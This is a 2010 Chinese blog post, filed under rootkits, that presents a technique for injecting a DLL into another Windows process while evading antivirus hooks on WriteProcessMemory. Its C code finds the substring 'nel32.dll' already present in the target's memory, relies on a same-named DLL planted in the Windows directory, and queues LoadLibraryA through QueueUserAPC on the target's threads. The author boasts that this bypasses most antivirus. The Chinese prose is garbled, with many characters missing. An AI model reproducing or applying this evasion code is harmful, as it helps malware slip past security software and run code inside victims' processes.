S.l.e!ep.¢%

像打了激速一样,以四倍的速度运转,开心的工作
简单、开放、平等的公司文化;尊重个性、自由与个人价值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

绕过主动防御的代码Inject方法思考

Posted on 2010-02-03 12:49 S.l.e!ep.¢% 阅读(1044) 评论(0)  编辑 收藏 引用 所属分类: RootKit
杀软都hook NtWriteVirtualMemoryNtUserSetWindowsHookAW、NtUserSetWindowsHookE防止代码注入。

  关于代码注入Ring3层有:

  l 远程线程CreateRemoteThread

  l 消息钩子SetWindowsHookEx

  l Ring3 APC QueueUserApc

  l 修改线程文SetContextThread

  其第三种传入个param,但求这个param必须目标进程存空间,比较笨重,直接目标进程VirtualAllocEx存,然希望参数入这个存,使WriteProcessMemory函数,而这个函数被hook,所以杀软容易拦截代码注入行

  仔细想想,杀软这种防御失败!原因个param,攻击完全没有必做这么动作去目标进程存空间申存并存,思考以不WriteProcessMemory函数呢?反个合理param,并且这个param目标进程存空间即

  思考,原这么容易啊,哈哈!乐半天~~~

  举个例子:假设这样注入

  QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

  想让param个“xxx.dll”,就,而且求这个param目标进程存空间

  您想么?哈哈

  答案:直接目标进程搜索个这样字符串“nel32.dll”就以啦!因“kernel32.dll” 这样字符串定存,那么“kernel32.dll” 不样,那就随便使“nel32.dll”,或“el32.dll”,都啊!最往windows目录面撂进入个nel32.dll,这样注入部分杀软都不能拦截!哈哈!

  段程序,做个试验,仅测试趋势,完美绕过!其实杀软稍测试。。。

DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
  
//////////////////////////////////////////////////////////////////////////
//不目标进程
//直接目标进程搜索出 nel32.dll 这样字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//获得该进程基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
  printf("CreateToolhelp32Snapshot error!n");
  return 0;
}
MODULEENTRY32 me = { sizeof(me) };
  BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
  printf("Module32First error!n");
  return 0;
}
  for (; fOk; fOk = Module32Next(hSnapshot,&me))
  {
  printf("%s process module name = %sn",processName,me.szModule);
    // 得进程模块基址
  if(stricmp(me.szModule,processName)==0)
  {
  defaultAddress=(DWORD)me.modBaseAddr;
  printf("%s process module base = 0x%08Xn",processName,defaultAddress);
  break;
  }
  }
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
  printf("ReadProcessMemory error!n");
  return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
  if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
  {
  printf("found nel32.dll already!... %sn",buffer+i);
  while (pCurrentTid)
  {
   HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
  
   if (hThread != NULL)
   {
   //
   // 注入DLL指定进程
   //
   QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
   }
  
   printf("TID:%dn", pCurrentTid->dwTid) ;
   pCurrentTid = pCurrentTid->pNext ;
  }
  break;
  }
}
  
return 0 ;
}


只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   博问   Chat2DB   管理